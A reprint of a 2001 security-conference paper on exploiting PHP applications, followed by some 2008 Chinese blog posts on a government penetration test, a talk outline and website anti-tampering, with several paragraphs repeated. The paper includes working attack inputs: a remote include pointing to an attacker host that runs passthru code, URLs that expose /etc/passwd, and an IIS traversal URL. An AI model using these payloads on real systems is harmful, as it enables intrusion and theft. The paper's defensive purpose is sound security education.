http://www.securereality.com.au/studyinscarlet.txt
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
A Study In Scarlet
Exploiting Common Vulnerabilities in PHP Applications
Shaun Clowes
SecureReality
"A reprint of reminisces from the Blackhat Briefings Asia 2001"
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- < Table of Contents > --------------------------------------------------
1. Introduction
2. Caveats and Scope
3. Global Variables
4. Remote Files
5. File Upload
6. Library Files
7. Session Files
8. Loose Typing And Associative Arrays
9. Target Functions
10. Protecting PHP
11. Responsibility - Language vs Programmer
12. Other
"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford
--- < 1. Introduction > ----------------------------------------------------
This paper is based on my speech during the Blackhat briefings in Singapore
and Hong Kong in April 2001. The speech was entitled "Breaking In Through
the Front Door - The impact of Web Applications and Application Service
Provision on Traditional Security Models". It initially discussed the trend
towards Web Applications (and ASP) and the holes in traditional security
methodology exposed by this trend. However, that's a long and boring
discussion so I'll save it for the policy makers.
The rest of the speech was spent talking about PHP. For those reading this
paper who don't know what PHP is, PHP stands for "PHP Hypertext
Preprocessor". It's a programming language (designed specifically for the
Web) in which PHP code is embedded in web pages. When a client requests a
page, the Web Server first passes the page to the language interpreter so
the code can be executed, the resulting page is then returned to the client.
Obviously this approach is much more suited to the page by page nature of
web transactions than traditional CGI languages such as Perl and C. PHP (and
to some extent other Web Languages) has the following characteristics:
+ Interpreted
+ Fast Execution - The interpreter is embedded in the web server, no fork()
or setup overhead
+ Feature Rich - Hundreds of non trivial builtin functions
+ Simple Syntax - Non declared and loosely typed variables, 'wordy'
function names
Over the course of this paper I'm going to try to explain why I feel the
last two characteristics make applications written in PHP easy to attack and
hard to defend. Then I'll finish off with a rant about distribution of
'blame' when it comes to software security.
"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford
--- < 2. Caveats and Scope > -----------------------------------------------
Almost all the observations in this paper refer to a default install of PHP
4.0.4pl1 (with MySQL, PostgreSQL, IMAP and OpenSSL support enabled) running
as a module under Apache 1.3.19 on a Linux machine. This of course means
that your mileage may vary, in particular, there have been many many
versions of PHP and they sometimes exhibit vastly different behaviour given
the same input.
Also, proponents of PHP tend to defend the language based on its extreme
configurability. I feel very confident the vast majority of users will not
modify the default PHP configuration at all, lest some of the amazing array
of freely available PHP software stop working. Thus I don't feel pressured
to defend my position based on configuration options, nonetheless I've
included a section about how to go defending PHP applications using these
configuration options.
Finally, some people deride this kind of work as 'trivial' or 'obvious',
particularly since I won't be discussing any specific vulnerabilities in
particular pieces of PHP software. To prove the risks are real and that even
programmer's that try hard fall into these traps 4 detailed advisories in
regards to specific pieces of vulnerable software will be released shortly
after this paper.
"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes
--- < 3. Global Variables > ------------------------------------------------
As mentioned earlier, variables in PHP don't have to be declared, they're
automatically created the first time they are used. Nor are they
specifically typed, they're typed automatically based on the context in
which they are used. This is an extremely convenient way to do things from a
programmer's perspective (and is obviously a useful feature in a rapid
application development language). Once a variable is created it can be
referenced anywhere in the program (except in functions where it must be
explicitly included in the namespace with the 'global' function). The result
of these characteristics is that variables are rarely initialized by the
programmer, after all, when they're first created they are empty (i.e "").
Obviously the main function of a PHP based web application is usually to
take in some client input (form variables, uploaded files, cookies etc),
process the input and return output based on that input. In order to make it
as simple as possible for the PHP script to access this input, it's actually
provided in the form of PHP global variables. Take the following example
HTML snippet:
<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello">
<INPUT TYPE="SUBMIT">
</FORM>
Obviously this will display a text box and a submit button. When the user
presses the submit button the PHP script test.php will be run to process the
input. When it runs the variable $hello will contain the text the user
entered into the text box. It's important to note the implications of this,
this means that a remote attacker can create any variable they wish and have
it declared in the global namespace. If instead of using the form above to
call test.php, an attacker calls it directly with a url like
"http://server/test.php?hello=hi&setup=no", not only will $hello = "hi" when
the script is run but $setup will be "no" also.
An example of how this can be a real problem might be a script that was
designed to authenticate a user before displaying some important
information. For example:
<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>
In normal operation the above code will check the password to decide if the
remote user has successfully authenticated then later check if they are
authenticated and show them the important information. The problem is that
the code incorrectly assumes that the variable $auth will be empty unless it
sets it. Remembering that an attacker can create variables in the global
namespace, a url like 'http://server/test.php?auth=1' will fail the password
check but the script will still believe the attacker has successfully
authenticated.
To summarize the above, a PHP script _cannot trust ANY variable it has not
EXPLICITLY set_. When you've got a rather large number of variables, this
can be a much harder task than it may sound.
Once common approach to protecting a script is to check that the variable is
not in the array HTTP_GET/POST_VARS[] (depending on the method normally used
to submit the form, GET or POST). When PHP is configured with track_vars
enabled (as it is by default) variables submitted by the user are available
both from the global variables and also as elements in the arrays mentioned
above. However, it's important to note that there are FOUR different arrays
for remote user input, HTTP_GET_VARS for variables submitted in the URL of
the get request, HTTP_POST_VARS for variables submitted in the post section
of a HTTP request, HTTP_COOKIE_VARS for variables submitted as part of the
cookie headers in the HTTP request and to a limited degree the
HTTP_POST_FILES array (in more recent versions of PHP). It is completely the
end users choice which method they use to submit variables, one request can
easily place variables in all four different arrays, a secure script needs
to check all four (though again, the HTTP_POST_FILES array shouldn't be an
issue except in exceptional circumstances).
"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson
--- < 4. Remote Files > ----------------------------------------------------
I'm going to repeat this frequently during this document but it bears
repeating, PHP is an extremely feature rich language. It ships with an
amazing amount of functionality out of the box and tries hard to make life
as easy as possible for the coder (or web designer as the case so often is).
From a security perspective, the more superfluous functionality offered by a
language and the less intuitive the possibilities, the more difficult it is
to secure applications written in it. An excellent example of this is the
Remote Files functionality of PHP.
The following piece of PHP code is designed to open a file:
<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename<BR>\n");
?>
The code attempts to open the file specified in the variable $filename for
reading and if it fails displays an error. Obviously this could be a simple
security issue if the user can set $filename and get the script to expose
/etc/passwd for example but one non intuitive this code could end up doing
is reading data from another web/ftp site. The remote files functionality
means that the majority of PHPs file handling functions can work
transparently on remote files via HTTP and FTP. If $filename were to contain
(for example)
"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" PHP will
actually make a HTTP request to the server "target", in this case trying to
exploit the unicode flaw.
This gets more interesting in the context of four other file functions that
support remote file functionality (*** except under Windows ***), include(),
require(), include_once() and require_once(). These functions take in a
filename and read that file and parse it as PHP code. They're typically used
to support the concept of code libraries, where common bits of PHP code are
stored in files and included as needed. Now take the following piece of
code:
<?php
include($libdir . "/languages.php");
?>
Presumably $libdir is a configuration variable that is meant to be set
earlier in script execution to the directory where the library files are
stored. If the attacker can cause the variable not to be set the script
(which is typically not a tremendously difficult task) and instead submit it
themselves they can modify the start of the path. This would normally gain
them nothing since they still end up only being able to access languages.php
in a directory of their choosing (poison null attacks like those possible on
Perl don't work under PHP) but with remote files the attack can submit any
code they wish to be executed. For example, if the attacker places a file on
a web server called languages.php containing the following:
<?php
passthru("/bin/ls /etc");
?>
then sets $libdir to "http://<evilhost>/" upon encountering the include
statement PHP will make a HTTP request to evilhost, retrieve the attackers
code and execute it, returning a listing of /etc to the attackers web
browser. Note that the attacking webserver (evilhost) can't be running PHP
or the code will be run on the attacking machine rather than the target
machine (see the "Other" section and its reference to SRADV00006 for an
example of code which survives being on a PHP enabled attacking machine).
"There are no crimes and no criminals in these days" - Sherlock Holmes
--- < 5. File Upload > -----------------------------------------------------
As if PHP hadn't already provided enough to make life easier for the
attacker the language provides automatic support for RFC 1867 based file
upload. Take the following form:
<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="hello">
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
<INPUT TYPE="SUBMIT">
</FORM>
This form will allow the web browser user to select a file from their local
machine then when they click submit the file will be uploaded to the remote
web server. This is obviously useful functionality but is PHPs response that
makes this dangerous. When PHP first receives the request, before it has
even BEGUN to parse the PHP script being called it will automatically
receive the file from the remote user, it will then check that the file is
no larger than specified in the $MAX_FILE_SIZE variable (10 kb in this case)
and the maximum file size set in the PHP configuration file, if it passes
these tests the file is SAVED on the local disk in a temporary directory.
Please read that again if that doesn't make you blink, a remote user can
send any file they wish to a PHP enabled machine and before a script has
even specified whether or not it accepts file uploads that file is SAVED on
the local disk.
I'm going to ignore any resource exhaustion attacks that may or may not be
possible using file upload functionality, I think they're fairly limited if
not impossible in any case.
First let's consider a script that IS designed to receive file uploads. As
described above the file is received and saved on the local disk (in the
location specified in the configuration for uploaded files, typically /tmp)
with a random filename (e.g "phpxXuoXG"). The PHP script then needs
information regarding the uploaded file to be able to process it. This is
actually provided in two different ways, one has been in use since early
versions of PHP 3, the other was introduced following our Advisory regarding
the issue I'm about to describe with the former method. Suffice to say the
problem is still alive and well, most scripts continue to use the old
method. PHP sets four global variables to describe the uploaded file, for
example (given the upload form above):
$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g
"c:\\temp\\hello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")
The PHP script then proceeds to work on the file as located via the $hello
variable. The problem is that it isn't immediately obvious that $hello need
not really be a PHP set variable and can simply be set by a remote attacker.
Take the following form input for example:
http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/
plain&hello_name=hello.txt
That results in the following global PHP variables (of course POST could be
used (even cookies)):
$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"
This form input will provide exactly the variables the PHP scripts expects
to be set by PHP, but instead of working on an uploaded file the script will
infact be working on /etc/passwd (usually resulting in its content being
exposed). This attack can be used to expose the contents of all sorts of
sensitive files (in particular configuration files containing database and
other third tier server credentials).
I noted above that newer versions of PHP provide different methods for
determining the uploaded files (it's done via the HTTP_POST_FILES[] array
mentioned earlier). It also provides numerous functions to avoid this
problem, for example a function to determine if a particular file is
actually one that has been uploaded. These methods well and truly fix the
problem but there is certainly no shortage of scripts out there still using
the old method and still vulnerable to this sort of attack.
As an alternate attack assisted by file upload consider the following
example PHP code:
<?php
if (file_exists($theme)) // Checks the file exists on the local system (no
remote files)
include("$theme");
?>
If the attacker can control $theme they can obviously use this to read any
file on the remote system (except that content inside PHP tags e.g "<?" will
be removed and interpreted probably crashing immediately). While this is a
problem the attackers ultimate goal is obviously to be able to execute
commands on the remote web server and they can't achieve that by getting the
include statement to work on remote files as discussed earlier. They
therefore need to get PHP code they define into a file local to the remote
machine. This sounds like an impossible task initially but file upload comes
to the rescue. If the attacker creates a file on their machine containing
PHP code to be executed (for example the passthru code shown earlier) then
creates a form which contains a file field called "theme" and uses this form
to submit the file to the script via file upload, PHP will be kind enough to
save the file and set $theme to the location of the attackers file on the
local machine. The file_exists() check will then succeed and the code will
be run.
Given command execution ability on the remote webserver the attacker will
obviously wish to attempt privilege escalation attacks or attacks on the
third tier servers, both of which will probably require a toolset not
present on the webserver. The file upload functionality once again makes
this a non issue, the attacker can simply upload the attack tools, have them
saved by PHP then use their code execution ability to chmod() the file and
execute it. For example, they could trivially upload a local root exploit
(through the firewall and past the IDS) and execute it.
"It was easier to know it than to explain why I knew it. If you were asked
to prove that two and two made four, you might find some difficulty, and yet
you are quite sure of the fact" - Sherlock Holmes
--- < 6. Library Files > ---------------------------------------------------
I've mentioned the include() and require() functions earlier, I also said
that they're generally used to support the concept of code libraries. What I
mean by that is that common bits of code are put into a separate file and
when needed in the application simply include()ed from the file. include()
and require() will take any specified filename and read the file and parse
its contents as PHP code.
Initially when people started developing and distributing PHP applications
they chose to distinguish library and main application code by giving
library files the '.inc' extension. However they quickly found this was a
bad move in general since such files aren't normally parsed as PHP code by
the PHP interpreter. If requested from the web server they will generally
have the full source code returned. This is because the PHP interpreter
(when used as an apache module) determines which files to parse for PHP code
based on the file's extension, the extensions to be interpreted can be
chosen by the administrator but usually a combination of the extensions
'.php', '.php4' and '.php3' is chosen. This is a real problem when sensitive
configuration data (e.g database credentials) is placed in PHP files that
don't have an appropriate extension since a remote attacker can easily get
the source.
The simplest solution (and the one that has since become favored) is simply
to give EVERY file a PHP parsed extension. This prevents a request to the
web server ever returning the raw source for a file that contains PHP code.
The problem here is that though the source will no longer be returned, by
requesting the file a remote attacker can have the code that is meant to be
used in a framework of other code executed out of context. This can lead to
all of the attacks I've described earlier.
An obvious example might be the following:
In main.php:
<?php
$libDir = "/libdir";
$langDir = "$libdir/languages";
...
include("$libdir/loadlanguage.php":
?>
In libdir/loadlanguage.php:
<?php
...
include("$langDir/$userLang");
?>
When libdir/loadlanguage.php is called in the defined context of main.php it
is perfectly safe. But because libdir/loadlanguage has the extension .php
(it doesn't have to have that extension, include() works on any file) it can
be requested and executed by a remote attacker. When out of context an
attacker can set $langDir and $userLang to whatever they wish.
"You know a conjuror gets no credit when once he has explained his trick and
if I show you too much of my method of working, you will come to the
conclusion that I am a very ordinary individual after all" - Sherlock Holmes
--- < 7. Session Files > ---------------------------------------------------
Later versions of PHP (4 and above) provide built-in support for 'sessions'.
Their basic purpose is to be able to save state information from page to
page in a PHP application. For example, when a user logs in to a web site,
the fact that they are logged in (and who they are logged in) could be saved
in the session. When they move around the site this information will be
available to all other PHP pages. What actually happens is that when a
session is started (it's typically set in the configuration file to be
automatically started on first request) a random session id is generated,
the session persists as long as the remote browser always submits this
session id with requests. This is most easily achieved with a cookie but can
also be done by achieved by putting a form variable (containing the session
id) on every page. The session is a variable store, a PHP application can
choose to register a particular variable with the session, its value is then
stored in a session file at the end of every PHP script and loaded into the
variable at the start of every script. A trivial example is as follows:
<?php
session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session
variable
?>
Any later PHP scripts will automatically have the variable $session_auth set
to "shaun", if they modify it later scripts will receive the modified value.
This is obviously a very handy facility to have in a stateless environment
like the web but caution is also necessary.
One obvious problem is with insuring that variables actually come from the
session. For example, given the above code, if a later script does the
following:
<?php
if (!empty($session_auth))
// Grant access to site here
?>
This code makes the assumption that if $session_auth is set, it must have
come from the session and not from remote input. If an attacker specified
$session_auth in form input they can gain access to the site. Note that the
attacker must use this attack before the variable is registered with the
session, once a variable is in a session it will override any form input.
Session data is saved in a file (in a configurable location, usually /tmp)
named 'sess_<session id>'. This file contains the names of the variables in
the session, their loose type, value and other data. On multi host systems
this can be an issue since the files are saved as the user running the web
server (typically nobody), a malicious site owner can easily create a
session file granting themselves access on another site or even examine the
session files looking for sensitive information.
The session mechanism also supplies another convenient place that an
attacker have their input saved into a file on the remote machine. For
examples above where the attacker needed PHP code in a file on the remote
machine, if they cannot use file upload they can often use the application
and have a session variable set to a value of their choosing. They can then
guess the location of the session file, they know the filename 'php<session
id>' they just have to guess the directory, usually /tmp.
Finally an issue I haven't found a use for is that an attacker can specify
any session id they wish (e.g 'hello') and have a session file created with
that id (for the example '/tmp/sess_hello'). The id can only contain
alphanumeric characters but this might well be useful in some situations.
"It is a mistake to confound strangeness with mystery" - Sherlock Holmes
--- < 8. Loose Typing And Associative Arrays > -----------------------------
Just a quick note about these factors.
PHP is a loosely typed language, that is, a variable has different values
depending on the context in which it is being evaluated. For example, the
variable $hello set to the empty string "" when evaluated as a number has
the value 0. This can sometimes lead to non intuitive results (a factor that
was important in the exploitation of phpMyAdmin in SRADV00008). If $hello is
set to "000" it is NOT equal to "0" nor will the function empty() return
true.
PHP arrays are associative, that is, the index to the array is a STRING and
can be set to any string value, it is not numerically evaluated. This means
that the array entry $hello["000"] is NOT the same as the array entry
$hello[0].
Applications need to be careful to validate user input with thought to the
above factors and to do so consistently. I.e don't test is something is
equal to 0 in one place and then validate it using empty() somewhere else.
"We want something more than mere preaching now" - Mr. Gregson
--- < 9. Target Functions > ------------------------------------------------
When looking for holes in PHP applications (when you have the source code)
it's useful to have a list of functions that are frequently misused or are
good targets if they happen to be used in a vulnerable manner in the target
application. If a remote user can affect the parameters to these functions
exploitation is often possible. The following is a non exhaustive breakdown.
PHP Code Execution:
require() and include() - Both these functions read a specified file and
interpret the contents as PHP code
eval() - Interprets a given string as PHP code
preg_replace() - When used with the /e modifier this function interprets the
replacement string as PHP code
Command Execution:
exec() - Executes a specified command and returns the last line of the
programs output
passthru() - Executes a specified command and returns all of the output
directly to the remote browser
`` (backticks) - Executes the specified command and returns all the output
in an array
system() - Much the same as passthru() but doesn't handle binary data
popen() - Executes a specified command and connects its output or input
stream to a PHP file descriptor
File Disclosure:
fopen() - Opens a file and associates it with a PHP file descriptor
readfile() - Reads a file and writes its contents directly to the remote
browser
file() - Reads an entire file into an array
"There is mystery about this which stimulates the imagination; where there
is no imagination there is no horror" - Sherlock Holmes
--- < 10. Protecting PHP
> --------------------------------------------------
All of the attacks I've described above work perfectly on a default
installation of PHP 4. However as I've mentioned numerous times PHP is
endlessly configurable and many of these attacks can be defeated using those
configuration options. There is always a price for security though, so I've
classified the following configuration options according to their
painfulness:
* = Mostly painless
** = Vaguely painful
*** = Seriously hurts
**** = Chinese Water Torture
Obviously my ratings are subjective so don't flame me for them. I will say
one thing though, if you use all of the options you'll have a very secure
PHP installation, even third party code will be reliably secure, it's just
that most of it won't work :)
**** - Set register_globals off
This option will stop PHP creating global variables for user input. That is,
if a user submits the form variable 'hello' PHP won't set $hello, only
HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is
best single option for PHP security, it will also kill basically every third
party application available and makes programming PHP a whole lot less
convenient.
*** - Set safe_mode on
I'd love to describe exactly what safe_mode does but it isn't documented
completely. It introduces a large variety of restrictions including:
- The ability to restrict which commands can be executed (by exec() etc)
- The ability to restrict which functions can be used
- Restricts file access based on ownership of script and target file
- Kills file upload completely
This is a great option for ISP environments (for which it is designed) but
it can also greatly improve the security of normal PHP environments given
proper configuration. It can also be a complete pain in the neck.
** - Set open_basedir
This option prevents any file operations on files outside specified
directories. This can effectively kill a variety of local include() and
remote file attacks. Caution is still required in regards to file upload and
session files.
** - Set display_errors off, log_errors on
This prevents PHP error messages being displayed in the returned web page.
This can effectively limit an attackers exploration of the function of the
script they are attacking. It can also make debugging very frustrating.
* - Set allow_url_fopen off
This stops remote files functionality. Very few sites really need this
functionality, I absolutely recommend every site set this option.
There may well be other great options I'm missing, please consult the PHP
documentation
"Our ideas must be as broad as nature if we are to interpret nature" -
Sherlock Holmes
--- < 11. Responsibility - Language Vs Programmer
> -------------------------
I contend that it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try. It's not that PHP is a bad
language, it's amazingly easy to program in and has more builtin features
than any other language I know. However PHP has such emphasis on rapid
development and feature richness that two things happen:
- Web designers and other non coders end up writing PHP applications. They
have no understanding whatsoever of the security implications of the code
they are writing. Partly this is because the mindset isn't what it should
be. A PHP application typically runs in the most exposed environment
possible, a universally accessible page on a web server. This means the
mindset should be of coding a network daemon that will be routinely
attacked, or of a setuid root application. Instead the mindset is
functionality at all costs like it would be while writing an unprivileged
local application. If your web server is penetrated it provides a gateway to
the third tier, it is always a bad thing, even if the access is as nobody
(as penetrating a PHP application will typically provide).
- Code behaviour becomes unpredictable. An include() statement that
postfixes a user variable with "image.php" would normally be perfectly safe,
the user can only specify which directory to retrieve that file from (and
presumably cannot create a file image.php on the remote machine). When
remote files functionality is allowed it becomes a nightmare. This is
completely non intuitive.
A lot of people blame programmer's for the code they write, I personally
feel that if a language makes it hard for a programmer to write good code
(particularly by being counterintuitive) the language must itself take some
of the blame for the situation. It's not good enough to just say the
programmer should know better. In almost every PHP application I've audited
the programmer's have _tried_ to get it right and only been let down by
their understanding of the intricacies of PHP. In its search for the
ultimate functionality PHP has undermined the programmer's ability to
understand the workings of their code in all situations.
"I have all the facts in my journal, and the public shall know them" - John
Watson
--- < 12. Other
> -----------------------------------------------------------
This is just a section for various other resources.
At a time when I thought no-one else was interested in PHP security, a few
great posts/advisories/papers have popped up:
- Rain Forest Puppy
RFP 2101 - "RFPlutonium to fuel your PHP-Nuke"
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=2
- Jo� Gouveia
Many posts to Bugtraq, check them all out, but as a selection
http://www.securityfocus.com/templates/archive.pike?list=1&mid=165519
http://www.securityfocus.com/templates/archive.pike?list=1&mid=147104
- Jouko Pynnonen
http://www.securityfocus.com/templates/archive.pike?list=1&mid=169045
There are many others, sorry I didn't list them all.
SecureReality have released a number of advisories regarding PHP
applications which should serve to illustrate the problems I've outlined in
this paper fairly well:
- SRADV00001 - Arbitrary File Disclosure through PHP File Upload
http://www.securereality.com.au/sradv00001.html
- SRADV00003 - Arbitrary File Disclosure through IMP
http://www.securereality.com.au/sradv00003.html
- SRADV00006 - Remote command execution vulnerabilities in phpGroupWare
http://www.securereality.com.au/sradv00006.html
- SRADV00008 - Remote command execution vulnerabilities in phpMyAdmin and
phpPgAdmin
http://www.securereality.com.au/sradv00008.txt
- SRADV00009 - Remote command execution vulnerabilities in phpSecurePages
http://www.securereality.com.au/sradv00009.txt
- SRADV00010 - Remote command execution vulnerabilities in SquirrelMail
http://www.securereality.com.au/sradv00010.txt
- SRADV00011 - Remote command execution vulnerabilities in WebCalendar
http://www.securereality.com.au/sradv00011.txt
The last four were presented during my speech at the BlackHat Briefings in
Singapore and Asia in 2001. Audio/Video of the speech will (at some stage)
be available at http://www.blackhat.com. For anyone interested in security,
I can't suggest more strongly that you go to the briefings.
Finally, incase anyone wondered where the title came from and all those
quotes at the end of each section, they're from the short story "A Study In
Scarlet" by Sir Arthur Conan Doyle which was also the first story in which
the character Sherlock Holmes appeared.
"I must thank you for it all. I might not have gone but for you, and so have
missed the finest study I ever came across: a study in scarlet eh?" -
Sherlock Holmes
http://www.securereality.com.au/studyinscarlet.txt
2008年8月1日星期五
远程安全风险评估,或者是结合性的渗透攻击测试
最近给朋友帮忙,测试某省政府网络(资产规模非常庞大)的安全性。他们去年已经做过安全项目,拉了国内2家著名的安全厂家,进行了一年时间的安全整改,前期也做了多次渗透测试,没有较大问题了。
虽然我的专长在于安全防护,保护系统和网络,保护方面还有一手,但在攻击方面,这么大年纪了,好长时间没做了,还真有些发怵。
但一做下来,发现问题太多了,系统和网络上,表面上看只开了邮件和web服务,只有几个jsp页面,而且每个jsp页面单独放在一台服务器上面运行(有钱就是好啊),做了大量的sql注入过滤,而且上了支持sql注入防护的防火墙和ids,在向内的网络使用了多台网闸,整个系统看上去固若金汤。朋友用了十几种扫描工具,包括web应用扫描的那几款著名工具,都没有发现任何问题,牛吧,政府网吧能做到这份上真是不多,因为是特别重要的部门,加上过去曾经出过事,领导非常重视,从预算中拿出一部分费用来做安全防护(对我们穷人来说也非常可观了),现在的系统,安全评估、加固一类已经做好很多次了。想想看,有哪个客户会花很多钱,买上国内国外好几套的扫描工具?几十台千兆防火墙?还有IDS。。。真是要命啊。
任务看上去非常有压力,但既然工具扫不出东西来,咱就按着入侵者的思路分析下去吧。结果不做不知道,一做吓一跳,居然发现三大类安全风险,都对系统有非常严重的威胁。最后,按照这些威胁,做了多个方面的入侵,拿到内网的多个服务器的操作权限,账户资源出写报告了。
做测试过程中了解到,有很多省市用了其中的某个系统,而且没有象他们这样专门再定制再加固。
后来另一个在安全界打滚多年的老朋友就说呢,哪有你这么实在的,渗透测试嘛,一般只要通过一个漏洞进入系统,就算完成任务了,很少会全面地找问题,再针对这些问题,每一个方面都进行完全地入侵,最后再给出详细的整改方案,靠呀,一个项目把所有活都干完了,其它人吃什么呀?好吧,我觉的应该不单算成是渗透攻击测试,而应该算是完全的远程安全评估,哈哈,从效果上看,应该是这样的。
工作告一段落,三天时间内只能晚上干活,还要写报告,累坏我了,以后不打算做渗透测试了,或者Zero知识的黑盒,远程风险评估了,还是发挥自己的长处,为大家提供安全风险评估、系统防御一类的东西吧。
虽然我的专长在于安全防护,保护系统和网络,保护方面还有一手,但在攻击方面,这么大年纪了,好长时间没做了,还真有些发怵。
但一做下来,发现问题太多了,系统和网络上,表面上看只开了邮件和web服务,只有几个jsp页面,而且每个jsp页面单独放在一台服务器上面运行(有钱就是好啊),做了大量的sql注入过滤,而且上了支持sql注入防护的防火墙和ids,在向内的网络使用了多台网闸,整个系统看上去固若金汤。朋友用了十几种扫描工具,包括web应用扫描的那几款著名工具,都没有发现任何问题,牛吧,政府网吧能做到这份上真是不多,因为是特别重要的部门,加上过去曾经出过事,领导非常重视,从预算中拿出一部分费用来做安全防护(对我们穷人来说也非常可观了),现在的系统,安全评估、加固一类已经做好很多次了。想想看,有哪个客户会花很多钱,买上国内国外好几套的扫描工具?几十台千兆防火墙?还有IDS。。。真是要命啊。
任务看上去非常有压力,但既然工具扫不出东西来,咱就按着入侵者的思路分析下去吧。结果不做不知道,一做吓一跳,居然发现三大类安全风险,都对系统有非常严重的威胁。最后,按照这些威胁,做了多个方面的入侵,拿到内网的多个服务器的操作权限,账户资源出写报告了。
做测试过程中了解到,有很多省市用了其中的某个系统,而且没有象他们这样专门再定制再加固。
后来另一个在安全界打滚多年的老朋友就说呢,哪有你这么实在的,渗透测试嘛,一般只要通过一个漏洞进入系统,就算完成任务了,很少会全面地找问题,再针对这些问题,每一个方面都进行完全地入侵,最后再给出详细的整改方案,靠呀,一个项目把所有活都干完了,其它人吃什么呀?好吧,我觉的应该不单算成是渗透攻击测试,而应该算是完全的远程安全评估,哈哈,从效果上看,应该是这样的。
工作告一段落,三天时间内只能晚上干活,还要写报告,累坏我了,以后不打算做渗透测试了,或者Zero知识的黑盒,远程风险评估了,还是发挥自己的长处,为大家提供安全风险评估、系统防御一类的东西吧。
2008年7月25日星期五
9月份要跟大家交流的内容
现在流行的攻击方法
大家都在使用的安全防护模式存在哪些问题
各种网络架构所面临的安全风险:举例演示google/baidu/msn等如何入侵
一个人控制一个国家的可能性:思路,通过演示验证思路的可行性和简易性
企业与个人的安全现状,防护手段,网络防御数据保护方法,信息网络影响下的经营风险
网络中一般存在哪些异常问题,如何识别和解决:病毒实现原理,病毒编写技术,通用防病毒技术,手工查杀病毒方法,常见网络故障排除方法
渗透攻击测试:选择渗透目标,渗透战术小组讨论,实施渗透,取得权限巩固肉鸡,清除痕迹,总结与提高
提供的系统防御方法
入侵检测与响应.如何察觉攻击,响应流程与方法,减少损害与保留证据
提供的安全服务:
安全策略
抗ddos攻击
安全风险评估、入侵损害恢复、系统加固、安全咨询与培训、事件紧急处理、入侵防护、安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护,抗ddos攻击、紧急响应等系统网络安全服务
收费标准:
2008年7月22日星期二
原来阿拉伯人喜欢用vpn啊
咱们喜欢用代理,阿拉伯这么喜欢VPN啊,不知道他们发布一些东西的时候,是不是大部分通过VPN
google一下freevpn,让人惊讶地发现,居然这么多的
ويرايش توسط freevpn : 2008-05-17 در ساعت 22:58. .... البته آن هم بطور کاملا رایگان میباشد. در تبلیغ FREEVPN کاملا مجانی - صفحه 6 -
انجمن نوفیلتر
google一下freevpn,让人惊讶地发现,居然这么多的
ويرايش توسط freevpn : 2008-05-17 در ساعت 22:58. .... البته آن هم بطور کاملا رایگان میباشد. در تبلیغ FREEVPN کاملا مجانی - صفحه 6 -
انجمن نوفیلتر
2008年7月21日星期一
最简单的网站防篡改方法
实际有个最简单的网站防篡改方法,尤其针对网站页面,效果挺好的,建议大家使用。
对于windows/linux下的网站,可以使用rsync,在独立于网站的另一台机器上,作为发布机,所有的内容都放在这台机器上面,网站只要与这台机器保持同步就可以了。可以把这台机器放在一个较为安全的地方,只放开rsync的服务,不需要多高的配置,只要网速高一些就可以了。网站永远都不会被修改,哈哈,简单粗暴有效啊。
当然,最好还是在linux下用,windows下的效率有些问题,不过要是网站规模不大的话,这个办法也挺好的,最起码对对付一阵儿了。但数据库问题还是无法解决,许多机构包括网易使用了那种游戏用的脚本LUMA做数据库代理,把所有的数据库访问包装起来,严格地过滤,现在看效果也不错啊,性能安全性都挺让人满意。
WINDOWS下还有个工具叫robocopy,不好这个好用。
Usage: rsync [OPTION]... SRC [SRC]... DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST:DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST::DEST
or rsync [OPTION]... SRC [SRC]... rsync://[USER@]HOST[:PORT]/DEST
or rsync [OPTION]... [USER@]HOST:SRC [DEST]
or rsync [OPTION]... [USER@]HOST::SRC [DEST]
or rsync [OPTION]... rsync://[USER@]HOST[:PORT]/SRC [DEST]
rsync -vzrtopg --progress --delete //192.168.1.9/g$ /cygdrive/j/tmp/extmail
rsync [选项]....[源]....[目地]
对于windows/linux下的网站,可以使用rsync,在独立于网站的另一台机器上,作为发布机,所有的内容都放在这台机器上面,网站只要与这台机器保持同步就可以了。可以把这台机器放在一个较为安全的地方,只放开rsync的服务,不需要多高的配置,只要网速高一些就可以了。网站永远都不会被修改,哈哈,简单粗暴有效啊。
当然,最好还是在linux下用,windows下的效率有些问题,不过要是网站规模不大的话,这个办法也挺好的,最起码对对付一阵儿了。但数据库问题还是无法解决,许多机构包括网易使用了那种游戏用的脚本LUMA做数据库代理,把所有的数据库访问包装起来,严格地过滤,现在看效果也不错啊,性能安全性都挺让人满意。
WINDOWS下还有个工具叫robocopy,不好这个好用。
Usage: rsync [OPTION]... SRC [SRC]... DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST:DEST
or rsync [OPTION]... SRC [SRC]... [USER@]HOST::DEST
or rsync [OPTION]... SRC [SRC]... rsync://[USER@]HOST[:PORT]/DEST
